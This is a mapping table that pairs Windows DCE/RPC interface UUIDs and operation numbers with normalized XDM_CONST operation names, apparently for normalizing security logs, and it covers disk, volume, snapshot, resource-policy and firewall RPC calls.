135698d2-3a37-4d26-99df-e2bb6ae3ac61:15 XDM_CONST.DCERPC_OPERATION_FT_DELETE_VOLUME
 Original Mapped Description

135698d2-3a37-4d26-99df-e2bb6ae3ac61:16 XDM_CONST.DCERPC_OPERATION_FT_BREAK_MIRROR

135698d2-3a37-4d26-99df-e2bb6ae3ac61:17 XDM_CONST.DCERPC_OPERATION_FT_RESYNC_MIRROR

135698d2-3a37-4d26-99df-e2bb6ae3ac61:18 XDM_CONST.DCERPC_OPERATION_FT_REGENERATE_PARITY_STRIPE

135698d2-3a37-4d26-99df-e2bb6ae3ac61:19 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_MIRROR_PARTITION

135698d2-3a37-4d26-99df-e2bb6ae3ac61:20 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_PARITY_STRIPE_PARTITION

135698d2-3a37-4d26-99df-e2bb6ae3ac61:21 XDM_CONST.DCERPC_OPERATION_ENUM_DRIVE_LETTERS

135698d2-3a37-4d26-99df-e2bb6ae3ac61:22 XDM_CONST.DCERPC_OPERATION_ASSIGN_DRIVE_LETTER

135698d2-3a37-4d26-99df-e2bb6ae3ac61:23 XDM_CONST.DCERPC_OPERATION_FREE_DRIVE_LETTER

135698d2-3a37-4d26-99df-e2bb6ae3ac61:24 XDM_CONST.DCERPC_OPERATION_ENUM_LOCAL_FILE_SYSTEMS

135698d2-3a37-4d26-99df-e2bb6ae3ac61:25 XDM_CONST.DCERPC_OPERATION_GET_INSTALLED_FILE_SYSTEMS

135698d2-3a37-4d26-99df-e2bb6ae3ac61:26 XDM_CONST.DCERPC_OPERATION_FORMAT

135698d2-3a37-4d26-99df-e2bb6ae3ac61:27 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUMES

135698d2-3a37-4d26-99df-e2bb6ae3ac61:28 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUME_MEMBERS

135698d2-3a37-4d26-99df-e2bb6ae3ac61:29 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:30 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT

135698d2-3a37-4d26-99df-e2bb6ae3ac61:31 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT_EX

135698d2-3a37-4d26-99df-e2bb6ae3ac61:32 XDM_CONST.DCERPC_OPERATION_GET_VOLUME_MOUNT_NAME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:33 XDM_CONST.DCERPC_OPERATION_GROW_VOLUME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:34 XDM_CONST.DCERPC_OPERATION_DELETE_VOLUME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:35 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITIONS_FOR_VOLUME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:36 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITIONS_FOR_VOLUME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:37 XDM_CONST.DCERPC_OPERATION_GET_MAX_ADJUSTED_FREE_SPACE

135698d2-3a37-4d26-99df-e2bb6ae3ac61:38 XDM_CONST.DCERPC_OPERATION_ADD_MIRROR

135698d2-3a37-4d26-99df-e2bb6ae3ac61:39 XDM_CONST.DCERPC_OPERATION_REMOVE_MIRROR

135698d2-3a37-4d26-99df-e2bb6ae3ac61:40 XDM_CONST.DCERPC_OPERATION_SPLIT_MIRROR

135698d2-3a37-4d26-99df-e2bb6ae3ac61:41 XDM_CONST.DCERPC_OPERATION_INITIALIZE_DISK_EX

135698d2-3a37-4d26-99df-e2bb6ae3ac61:42 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE_DISK

135698d2-3a37-4d26-99df-e2bb6ae3ac61:43 XDM_CONST.DCERPC_OPERATION_RE_CONNECT_DISK

135698d2-3a37-4d26-99df-e2bb6ae3ac61:44 XDM_CONST.DCERPC_OPERATION_IMPORT_DISK_GROUP

135698d2-3a37-4d26-99df-e2bb6ae3ac61:45 XDM_CONST.DCERPC_OPERATION_DISK_MERGE_QUERY

135698d2-3a37-4d26-99df-e2bb6ae3ac61:46 XDM_CONST.DCERPC_OPERATION_DISK_MERGE

135698d2-3a37-4d26-99df-e2bb6ae3ac61:47 XDM_CONST.DCERPC_OPERATION_RE_ATTACH_DISK

135698d2-3a37-4d26-99df-e2bb6ae3ac61:48 XDM_CONST.DCERPC_OPERATION_REPLACE_RAID5_COLUMN

135698d2-3a37-4d26-99df-e2bb6ae3ac61:49 XDM_CONST.DCERPC_OPERATION_RESTART_VOLUME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:50 XDM_CONST.DCERPC_OPERATION_GET_ENCAPSULATE_DISK_INFO_EX

135698d2-3a37-4d26-99df-e2bb6ae3ac61:51 XDM_CONST.DCERPC_OPERATION_ENCAPSULATE_DISK_EX

135698d2-3a37-4d26-99df-e2bb6ae3ac61:52 XDM_CONST.DCERPC_OPERATION_QUERY_CHANGE_PARTITION_NUMBERS

135698d2-3a37-4d26-99df-e2bb6ae3ac61:53 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION_NUMBER_INFO_FROM_REGISTRY

135698d2-3a37-4d26-99df-e2bb6ae3ac61:54 XDM_CONST.DCERPC_OPERATION_SET_DONT_SHOW

135698d2-3a37-4d26-99df-e2bb6ae3ac61:55 XDM_CONST.DCERPC_OPERATION_GET_DONT_SHOW

135698d2-3a37-4d26-99df-e2bb6ae3ac61:64 XDM_CONST.DCERPC_OPERATION_ENUM_TASKS
 Original Mapped Description

135698d2-3a37-4d26-99df-e2bb6ae3ac61:65 XDM_CONST.DCERPC_OPERATION_GET_TASK_DETAIL

135698d2-3a37-4d26-99df-e2bb6ae3ac61:66 XDM_CONST.DCERPC_OPERATION_ABORT_TASK

135698d2-3a37-4d26-99df-e2bb6ae3ac61:67 XDM_CONST.DCERPC_OPERATION_HR_GET_ERROR_DATA

135698d2-3a37-4d26-99df-e2bb6ae3ac61:68 XDM_CONST.DCERPC_OPERATION_INITIALIZE

135698d2-3a37-4d26-99df-e2bb6ae3ac61:69 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE

135698d2-3a37-4d26-99df-e2bb6ae3ac61:70 XDM_CONST.DCERPC_OPERATION_REFRESH

135698d2-3a37-4d26-99df-e2bb6ae3ac61:71 XDM_CONST.DCERPC_OPERATION_RESCAN_DISKS

135698d2-3a37-4d26-99df-e2bb6ae3ac61:72 XDM_CONST.DCERPC_OPERATION_REFRESH_FILE_SYS

135698d2-3a37-4d26-99df-e2bb6ae3ac61:73 XDM_CONST.DCERPC_OPERATION_SECURE_SYSTEM_PARTITION

135698d2-3a37-4d26-99df-e2bb6ae3ac61:74 XDM_CONST.DCERPC_OPERATION_SHUT_DOWN_SYSTEM

135698d2-3a37-4d26-99df-e2bb6ae3ac61:75 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH

135698d2-3a37-4d26-99df-e2bb6ae3ac61:76 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH_FOR_VOLUME

135698d2-3a37-4d26-99df-e2bb6ae3ac61:77 XDM_CONST.DCERPC_OPERATION_ADD_ACCESS_PATH

135698d2-3a37-4d26-99df-e2bb6ae3ac61:78 XDM_CONST.DCERPC_OPERATION_DELETE_ACCESS_PATH

deb01010-3a37-4d26-99df-e2bb6ae3ac61:3 XDM_CONST.DCERPC_OPERATION_REFRESH_EX

deb01010-3a37-4d26-99df-e2bb6ae3ac61:4 XDM_CONST.DCERPC_OPERATION_GET_VOLUME_DEVICE_NAME

214a0f28-b737-4026-b847-4f9e37d79529:3 XDM_CONST.DCERPC_OPERATION_ADD_DIFF_AREA

214a0f28-b737-4026-b847-4f9e37d79529:4 XDM_CONST.DCERPC_OPERATION_CHANGE_DIFF_AREA_MAXIMIZE_SIZE

214a0f28-b737-4026-b847-4f9e37d79529:5 XDM_CONST.DCERPC_OPERATION_QUERY_VOLUMES_SUPPORTED_FOR_DIFF_AREAS

214a0f28-b737-4026-b847-4f9e37d79529:6 XDM_CONST.DCERPC_OPERATION_QUERY_DIFF_AREAS_FOR_VOLUME

214a0f28-b737-4026-b847-4f9e37d79529:7 XDM_CONST.DCERPC_OPERATION_QUERY_DIFF_AREA_ON_VOLUME

01954e6b-9254-4e6e-808c-c9e05d007696:3 XDM_CONST.DCERPC_OPERATION_NEXT

01954e6b-9254-4e6e-808c-c9e05d007696:4 XDM_CONST.DCERPC_OPERATION_SKIP

01954e6b-9254-4e6e-808c-c9e05d007696:5 XDM_CONST.DCERPC_OPERATION_RESET

01954e6b-9254-4e6e-808c-c9e05d007696:6 XDM_CONST.DCERPC_OPERATION_CLONE

ae1c7110-2f60-11d3-8a39-00c04f72d8e3:3 XDM_CONST.DCERPC_OPERATION_NEXT

ae1c7110-2f60-11d3-8a39-00c04f72d8e3:4 XDM_CONST.DCERPC_OPERATION_SKIP

ae1c7110-2f60-11d3-8a39-00c04f72d8e3:5 XDM_CONST.DCERPC_OPERATION_RESET

ae1c7110-2f60-11d3-8a39-00c04f72d8e3:6 XDM_CONST.DCERPC_OPERATION_CLONE

fa7df749-66e7-4986-a27f-e2f04ae53772:3 XDM_CONST.DCERPC_OPERATION_GET_PROVIDER_MGMT_INTERFACE

fa7df749-66e7-4986-a27f-e2f04ae53772:4 XDM_CONST.DCERPC_OPERATION_QUERY_VOLUMES_SUPPORTED_FOR_SNAPSHOTS

fa7df749-66e7-4986-a27f-e2f04ae53772:5 XDM_CONST.DCERPC_OPERATION_QUERY_SNAPSHOTS_BY_VOLUME

29822ab7-f302-11d0-9953-00c04fd919c1:3 XDM_CONST.DCERPC_OPERATION_APP_CREATE

29822ab7-f302-11d0-9953-00c04fd919c1:4 XDM_CONST.DCERPC_OPERATION_APP_DELETE

29822ab7-f302-11d0-9953-00c04fd919c1:5 XDM_CONST.DCERPC_OPERATION_APP_UN_LOAD

29822ab7-f302-11d0-9953-00c04fd919c1:6 XDM_CONST.DCERPC_OPERATION_APP_GET_STATUS

29822ab7-f302-11d0-9953-00c04fd919c1:7 XDM_CONST.DCERPC_OPERATION_APP_DELETE_RECOVERABLE

29822ab7-f302-11d0-9953-00c04fd919c1:8 XDM_CONST.DCERPC_OPERATION_APP_RECOVER

29822ab8-f302-11d0-9953-00c04fd919c1:9 XDM_CONST.DCERPC_OPERATION_APP_CREATE2

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:7 XDM_CONST.DCERPC_OPERATION_CREATE_ACCOUNTING_DB

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:8 XDM_CONST.DCERPC_OPERATION_GET_ACCOUNTING_METADATA
 Original Mapped Description

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:9 XDM_CONST.DCERPC_OPERATION_EXECUTE_ACCOUNTING_QUERY

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:10 XDM_CONST.DCERPC_OPERATION_GET_RAW_ACCOUNTING_DATA

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:11 XDM_CONST.DCERPC_OPERATION_GET_NEXT_ACCOUNTING_DATA_BATCH

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:12 XDM_CONST.DCERPC_OPERATION_DELETE_ACCOUNTING_DATA

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:13 XDM_CONST.DCERPC_OPERATION_DEFRAGMENT_DB

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:14 XDM_CONST.DCERPC_OPERATION_CANCEL_ACCOUNTING_QUERY

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:15 XDM_CONST.DCERPC_OPERATION_REGISTER_ACCOUNTING_CLIENT

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:16 XDM_CONST.DCERPC_OPERATION_DUMP_ACCOUNTING_DATA

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:17 XDM_CONST.DCERPC_OPERATION_GET_ACCOUNTING_CLIENTS

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:18 XDM_CONST.DCERPC_OPERATION_SET_ACCOUNTING_CLIENT_STATUS

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:19 XDM_CONST.DCERPC_OPERATION_CHECK_ACCOUNTING_CONNECTION

4f7ca01c-a9e5-45b6-b142-2332a1339c1d:20 XDM_CONST.DCERPC_OPERATION_SET_CLIENT_PERMISSIONS

481e06cf-ab04-4498-8ffe-124a0a34296d:7 XDM_CONST.DCERPC_OPERATION_GET_CALENDAR_INFO

481e06cf-ab04-4498-8ffe-124a0a34296d:8 XDM_CONST.DCERPC_OPERATION_CREATE_CALENDAR

481e06cf-ab04-4498-8ffe-124a0a34296d:9 XDM_CONST.DCERPC_OPERATION_MODIFY_CALENDAR

481e06cf-ab04-4498-8ffe-124a0a34296d:10 XDM_CONST.DCERPC_OPERATION_DELETE_CALENDAR

481e06cf-ab04-4498-8ffe-124a0a34296d:11 XDM_CONST.DCERPC_OPERATION_RENAME_CALENDAR

481e06cf-ab04-4498-8ffe-124a0a34296d:12 XDM_CONST.DCERPC_OPERATION_COMPUTE_EVENTS

481e06cf-ab04-4498-8ffe-124a0a34296d:13 XDM_CONST.DCERPC_OPERATION_GET_SCHEDULE_INFO

481e06cf-ab04-4498-8ffe-124a0a34296d:14 XDM_CONST.DCERPC_OPERATION_CREATE_SCHEDULE

481e06cf-ab04-4498-8ffe-124a0a34296d:15 XDM_CONST.DCERPC_OPERATION_MODIFY_SCHEDULE

481e06cf-ab04-4498-8ffe-124a0a34296d:16 XDM_CONST.DCERPC_OPERATION_DELETE_SCHEDULE

481e06cf-ab04-4498-8ffe-124a0a34296d:17 XDM_CONST.DCERPC_OPERATION_RENAME_SCHEDULE

481e06cf-ab04-4498-8ffe-124a0a34296d:18 XDM_CONST.DCERPC_OPERATION_MOVE_BEFORE_CALENDAR

481e06cf-ab04-4498-8ffe-124a0a34296d:19 XDM_CONST.DCERPC_OPERATION_MOVE_AFTER_CALENDAR

481e06cf-ab04-4498-8ffe-124a0a34296d:20 XDM_CONST.DCERPC_OPERATION_GET_SERVER_TIME_ZONE

21546ae8-4da5-445e-987f-627fea39c5e8:7 XDM_CONST.DCERPC_OPERATION_GET_CONFIG

21546ae8-4da5-445e-987f-627fea39c5e8:8 XDM_CONST.DCERPC_OPERATION_SET_CONFIG

21546ae8-4da5-445e-987f-627fea39c5e8:9 XDM_CONST.DCERPC_OPERATION_IS_ENABLED

21546ae8-4da5-445e-987f-627fea39c5e8:10 XDM_CONST.DCERPC_OPERATION_ENABLE_DISABLE

21546ae8-4da5-445e-987f-627fea39c5e8:11 XDM_CONST.DCERPC_OPERATION_GET_EXCLUSION_LIST

21546ae8-4da5-445e-987f-627fea39c5e8:12 XDM_CONST.DCERPC_OPERATION_SET_EXCLUSION_LIST

21546ae8-4da5-445e-987f-627fea39c5e8:13 XDM_CONST.DCERPC_OPERATION_WSRM_ACTIVATE

21546ae8-4da5-445e-987f-627fea39c5e8:14 XDM_CONST.DCERPC_OPERATION_IS_WSRM_ACTIVATED

21546ae8-4da5-445e-987f-627fea39c5e8:15 XDM_CONST.DCERPC_OPERATION_RESTORE_EXCLUSION_LIST

943991a5-b3fe-41fa-9696-7f7b656ee34b:7 XDM_CONST.DCERPC_OPERATION_CREATE_MACHINE_GROUP

943991a5-b3fe-41fa-9696-7f7b656ee34b:8 XDM_CONST.DCERPC_OPERATION_GET_MACHINE_GROUP_INFO

943991a5-b3fe-41fa-9696-7f7b656ee34b:9 XDM_CONST.DCERPC_OPERATION_MODIFY_MACHINE_GROUP

943991a5-b3fe-41fa-9696-7f7b656ee34b:10 XDM_CONST.DCERPC_OPERATION_DELETE_MACHINE_GROUP

943991a5-b3fe-41fa-9696-7f7b656ee34b:11 XDM_CONST.DCERPC_OPERATION_RENAME_MACHINE_GROUP

943991a5-b3fe-41fa-9696-7f7b656ee34b:12 XDM_CONST.DCERPC_OPERATION_ADD_MACHINE
 Original Mapped Description

943991a5-b3fe-41fa-9696-7f7b656ee34b:13 XDM_CONST.DCERPC_OPERATION_GET_MACHINE_INFO

943991a5-b3fe-41fa-9696-7f7b656ee34b:14 XDM_CONST.DCERPC_OPERATION_MODIFY_MACHINE_INFO

943991a5-b3fe-41fa-9696-7f7b656ee34b:15 XDM_CONST.DCERPC_OPERATION_DELETE_MACHINE

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:7 XDM_CONST.DCERPC_OPERATION_GET_POLICY_INFO

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:8 XDM_CONST.DCERPC_OPERATION_CREATE_POLICY

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:9 XDM_CONST.DCERPC_OPERATION_MODIFY_POLICY

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:10 XDM_CONST.DCERPC_OPERATION_DELETE_POLICY

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:11 XDM_CONST.DCERPC_OPERATION_RENAME_ALLOCATION_POLICY

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:12 XDM_CONST.DCERPC_OPERATION_MOVE_BEFORE

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:13 XDM_CONST.DCERPC_OPERATION_MOVE_AFTER

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:14 XDM_CONST.DCERPC_OPERATION_SET_CAL_DEFAULT_POLICY_NAME

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:15 XDM_CONST.DCERPC_OPERATION_GET_CAL_DEFAULT_POLICY_NAME

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:16 XDM_CONST.DCERPC_OPERATION_GET_PROCESS_LIST

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:17 XDM_CONST.DCERPC_OPERATION_GET_CURRENT_POLICY

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:18 XDM_CONST.DCERPC_OPERATION_SET_CURRENT_POLICY

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:19 XDM_CONST.DCERPC_OPERATION_GET_CURRENT_STATE_AND_ACTIVE_POLICY_NAME

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:20 XDM_CONST.DCERPC_OPERATION_GET_CONDITIONAL_POLICY

59602eb6-57b0-4fd8-aa4b-ebf06971fe15:21 XDM_CONST.DCERPC_OPERATION_SET_CONDITIONAL_POLICY

f31931a9-832d-481c-9503-887a0e6a79f0:7 XDM_CONST.DCERPC_OPERATION_GET_SUPPORTED_CLIENT

fc910418-55ca-45ef-b264-83d4ce7d30e0:7 XDM_CONST.DCERPC_OPERATION_GET_REMOTE_USER_CATEGORIES

fc910418-55ca-45ef-b264-83d4ce7d30e0:8 XDM_CONST.DCERPC_OPERATION_SET_REMOTE_USER_CATEGORIES

fc910418-55ca-45ef-b264-83d4ce7d30e0:9 XDM_CONST.DCERPC_OPERATION_REFRESH_REMOTE_SESSION_WEIGHTS

bc681469-9dd9-4bf4-9b3d-709f69efe431:7 XDM_CONST.DCERPC_OPERATION_GET_RESOURCE_GROUP_INFO

bc681469-9dd9-4bf4-9b3d-709f69efe431:8 XDM_CONST.DCERPC_OPERATION_MODIFY_RESOURCE_GROUP

bc681469-9dd9-4bf4-9b3d-709f69efe431:9 XDM_CONST.DCERPC_OPERATION_CREATE_RESOURCE_GROUP

bc681469-9dd9-4bf4-9b3d-709f69efe431:10 XDM_CONST.DCERPC_OPERATION_DELETE_RESOURCE_GROUP

bc681469-9dd9-4bf4-9b3d-709f69efe431:11 XDM_CONST.DCERPC_OPERATION_RENAME_RESOURCE_GROUP

e33c0cc4-0482-101a-bc0c-02608c6ba218:0 XDM_CONST.DCERPC_OPERATION_INSILOOKUPBEGIN

e33c0cc4-0482-101a-bc0c-02608c6ba218:1 XDM_CONST.DCERPC_OPERATION_INSILOOKUPDONE

e33c0cc4-0482-101a-bc0c-02608c6ba218:2 XDM_CONST.DCERPC_OPERATION_INSILOOKUPNEXT

e33c0cc4-0482-101a-bc0c-02608c6ba218:3 XDM_CONST.DCERPC_OPERATION_INSIENTRYOBJECTINQNEXT

e33c0cc4-0482-101a-bc0c-02608c6ba218:4 XDM_CONST.DCERPC_OPERATION_INSIPINGLOCATOR

e33c0cc4-0482-101a-bc0c-02608c6ba218:5 XDM_CONST.DCERPC_OPERATION_INSIENTRYOBJECTINQDONE

e33c0cc4-0482-101a-bc0c-02608c6ba218:6 XDM_CONST.DCERPC_OPERATION_INSIENTRYOBJECTINQBEGIN

afc07e2e-311c-4435-808c-c483ffeec7c9:0 XDM_CONST.DCERPC_OPERATION_LSAR_GET_AVAILABLE_CAPI_DS

22e5386d-8b12-4bf0-b0ec-6a1ea419e366:0 XDM_CONST.DCERPC_OPERATION_RPC_NET_EVENT_OPEN_SESSION

22e5386d-8b12-4bf0-b0ec-6a1ea419e366:1 XDM_CONST.DCERPC_OPERATION_RPC_NET_EVENT_RECEIVE_DATA

22e5386d-8b12-4bf0-b0ec-6a1ea419e366:2 XDM_CONST.DCERPC_OPERATION_RPC_NET_EVENT_CLOSE_SESSION

d049b186-814f-11d1-9a3c-00c04fc9b232:4 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_SET_DS_POLLING_INTERVAL_W

d049b186-814f-11d1-9a3c-00c04fc9b232:5 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_GET_DS_POLLING_INTERVAL_W

d049b186-814f-11d1-9a3c-00c04fc9b232:7 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_INFO_W
 Original Mapped Description

d049b186-814f-11d1-9a3c-00c04fc9b232:8 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_IS_PATH_REPLICATED

d049b186-814f-11d1-9a3c-00c04fc9b232:9 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_WRITER_COMMAND

d049b186-814f-11d1-9a3c-00c04fc9b232:10 XDM_CONST.DCERPC_OPERATION_NT_FRS_API_RPC_FORCE_REPLICATION

497d95a6-2d27-4bf5-9bbd-a6046957133c:0 XDM_CONST.DCERPC_OPERATION_RPC_OPEN_LISTENER

497d95a6-2d27-4bf5-9bbd-a6046957133c:1 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_LISTENER

497d95a6-2d27-4bf5-9bbd-a6046957133c:2 XDM_CONST.DCERPC_OPERATION_RPC_STOP_LISTENER

497d95a6-2d27-4bf5-9bbd-a6046957133c:3 XDM_CONST.DCERPC_OPERATION_RPC_START_LISTENER

497d95a6-2d27-4bf5-9bbd-a6046957133c:4 XDM_CONST.DCERPC_OPERATION_RPC_IS_LISTENING

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:0 XDM_CONST.DCERPC_OPERATION_RPC_GET_CLIENT_DATA

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:1 XDM_CONST.DCERPC_OPERATION_RPC_GET_CONFIG_DATA

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:2 XDM_CONST.DCERPC_OPERATION_RPC_GET_PROTOCOL_STATUS

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:3 XDM_CONST.DCERPC_OPERATION_RPC_GET_LAST_INPUT_TIME

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:4 XDM_CONST.DCERPC_OPERATION_RPC_GET_REMOTE_ADDRESS

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:8 XDM_CONST.DCERPC_OPERATION_RPC_GET_ALL_LISTENERS

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:9 XDM_CONST.DCERPC_OPERATION_RPC_GET_SESSION_PROTOCOL_LAST_INPUT_TIME

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:10 XDM_CONST.DCERPC_OPERATION_RPC_GET_USER_CERTIFICATES

bde95fdf-eee0-45de-9e12-e5a61cd0d4fe:11 XDM_CONST.DCERPC_OPERATION_RPC_QUERY_SESSION_DATA

6b5bdd1e-528c-422c-af8c-a4079be4fe48:0 XDM_CONST.DCERPC_OPERATION_RRPCFW_OPEN_POLICY_STORE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:1 XDM_CONST.DCERPC_OPERATION_RRPCFW_CLOSE_POLICY_STORE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:2 XDM_CONST.DCERPC_OPERATION_RRPCFW_RESTORE_DEFAULTS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:3 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_GLOBAL_CONFIG

6b5bdd1e-528c-422c-af8c-a4079be4fe48:4 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_GLOBAL_CONFIG

6b5bdd1e-528c-422c-af8c-a4079be4fe48:5 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_FIREWALL_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:6 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_FIREWALL_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:7 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_FIREWALL_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:8 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_FIREWALL_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:9 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_FIREWALL_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:10 XDM_CONST.DCERPC_OPERATION_RRPCFW_GET_CONFIG

6b5bdd1e-528c-422c-af8c-a4079be4fe48:11 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONFIG

6b5bdd1e-528c-422c-af8c-a4079be4fe48:12 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CONNECTION_SECURITY_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:13 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CONNECTION_SECURITY_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:14 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_CONNECTION_SECURITY_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:15 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:16 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CONNECTION_SECURITY_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:17 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_AUTHENTICATION_SET

6b5bdd1e-528c-422c-af8c-a4079be4fe48:18 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_AUTHENTICATION_SET

6b5bdd1e-528c-422c-af8c-a4079be4fe48:19 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_AUTHENTICATION_SET

6b5bdd1e-528c-422c-af8c-a4079be4fe48:20 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_AUTHENTICATION_SETS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:21 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_AUTHENTICATION_SETS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:22 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_CRYPTO_SET

6b5bdd1e-528c-422c-af8c-a4079be4fe48:23 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_CRYPTO_SET
 Original Mapped Description

6b5bdd1e-528c-422c-af8c-a4079be4fe48:24 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_CRYPTO_SET

6b5bdd1e-528c-422c-af8c-a4079be4fe48:25 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_CRYPTO_SETS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:26 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_CRYPTO_SETS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:27 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_PHASE1_S_AS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:28 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_PHASE2_S_AS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:29 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_PHASE1_S_AS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:30 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_PHASE2_S_AS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:31 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_PRODUCTS

6b5bdd1e-528c-422c-af8c-a4079be4fe48:32 XDM_CONST.DCERPC_OPERATION_RRPCFW_ADD_MAIN_MODE_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:33 XDM_CONST.DCERPC_OPERATION_RRPCFW_SET_MAIN_MODE_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:34 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_MAIN_MODE_RULE

6b5bdd1e-528c-422c-af8c-a4079be4fe48:35 XDM_CONST.DCERPC_OPERATION_RRPCFW_DELETE_ALL_MAIN_MODE_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:36 XDM_CONST.DCERPC_OPERATION_RRPCFW_ENUM_MAIN_MODE_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:37 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_FIREWALL_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:38 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_CONNECTION_SECURITY_RULES

6b5bdd1e-528c-422c-af8c-a4079be4fe48:39 XDM_CONST.DCERPC_OPERATION_RRPCFW_QUERY_MAIN_MODE_RULES

